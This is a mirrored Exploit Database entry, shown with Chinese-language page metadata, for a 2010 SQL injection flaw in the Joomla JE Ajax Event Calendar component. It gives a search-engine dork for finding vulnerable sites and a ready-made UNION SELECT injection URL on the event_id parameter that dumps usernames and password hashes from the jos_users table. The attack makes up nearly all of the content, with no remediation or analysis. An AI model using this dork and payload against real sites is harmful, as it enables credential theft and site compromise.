Joomla! Component JE Ajax Event Calendar – SQL Injection

• Exploit Database
• 116 阅读

• 作者： ALTBTA
  日期： 2010-11-25
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15610/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25

  # Vendor: http://joomlaextensions.co.in/extensions/components/je-ajax-event-calender.html   # Download: http://extensions.joomla.org/extensions/calendars-a-events/events/events-calendars/12110   # Author: altbta   # Contact: l_9[at]Hotmail[Dot]com   # Home: http://xp10.com   # Thanks to: rxhxp10.com >> v4-team.com >> p0c.cc :))   ==========================================================================   [+] Dork: inurl:"index.php?option=com_jeajaxeventcalendar"   ==========================================================================   [+] exploit: http://127.168.1.1/index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4/**/from/**/jos_users--   ==========================================================================